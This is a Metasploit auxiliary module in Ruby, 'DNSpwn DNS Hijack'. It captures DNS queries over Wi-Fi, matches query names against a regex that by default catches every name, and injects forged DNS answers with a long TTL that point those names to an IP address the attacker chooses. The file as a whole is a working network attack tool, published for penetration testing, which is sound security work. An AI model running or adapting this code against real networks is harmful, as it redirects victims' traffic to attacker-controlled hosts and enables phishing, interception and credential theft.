metasploit-framework/modules/auxiliary/spoof/wifi/dnspwn.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'yaml'
require 'net/dns/packet'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Capture
  include Msf::Exploit::Lorcon2
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'DNSpwn DNS Hijack',
      'Description'    => %q{
        Race DNS responses and replace DNS queries
      },
      'Author'      => ['dragorn'],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        OptPath.new('DNSLIST',	  [ false, "YAML file of DNS entries for replacement",
            File.join(Msf::Config.data_directory, "exploits", "wifi", "dnspwn", "dnslist.yml")
          ]),
        OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]),
        OptString.new('FILTER',	  [ true, "Default BPF filter", "port 53"]),
        OptString.new('IP',		  [ true, "IP for host resolution", "1.2.3.4" ]),
        OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]),
        OptString.new('MATCH',	  [ true, "Match for DNS name replacement", "(.*)"]),
      ], self.class)
  end

  def run

    @dnslist  = datastore['DNSLIST']
    @regex    = datastore['MATCH']
    @response = datastore['IP']
    @filter	  = datastore['FILTER']
    @duration = datastore['DURATION']
    @useyaml  = datastore['USEDNSFILE']

    @dns = []

    if @useyaml
      begin
        @dns = YAML::load_file(@dnslist)
      rescue ::Exception => e
        print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
      end
    else
      @dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration }
    end

    @run = true

    open_wifi

    self.wifi.filter = @filter if not @filter.empty?
    each_packet do |pkt|
      d3 = pkt.dot3

      next if not d3
      p = PacketFu::Packet.parse(d3) rescue nil
      next unless p.is_udp?

      dns = Net::DNS::Packet::parse(p.payload) rescue nil
      next unless dns

      next if dns.answer.size != 0
      next if dns.question.size == 0

      @dns.each do |r|
        hit = nil
        r['regex'].each do |reg|
          hit = dns.question[0].qName.scan(/#{reg}/) || nil
          break if hit.size != 0
        end
        next if hit.size.zero?

        print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ])

        injpkt = Lorcon::Packet.new()
        injpkt.bssid = pkt.bssid

        response_pkt = PacketFu::UDPPacket.new
        response_pkt.eth_daddr = p.eth_saddr
        response_pkt.eth_saddr = p.eth_daddr
        response_pkt.ip_saddr = p.ip_daddr
        response_pkt.ip_daddr = p.ip_saddr
        response_pkt.ip_ttl = p.ip_ttl
        response_pkt.udp_sport = p.udp_dport
        response_pkt.udp_dport = p.udp_sport

        dns.header.qr = 1
        dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"])

        response_pkt.payload = dns.data
        response_pkt.recalc

        injpkt.dot3 = response_pkt.to_s

        if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS)
          injpkt.direction = Lorcon::Packet::LORCON_TO_DS
        elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS)
          injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
        else
          injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
        end

        self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error)
      end
    end
  end
end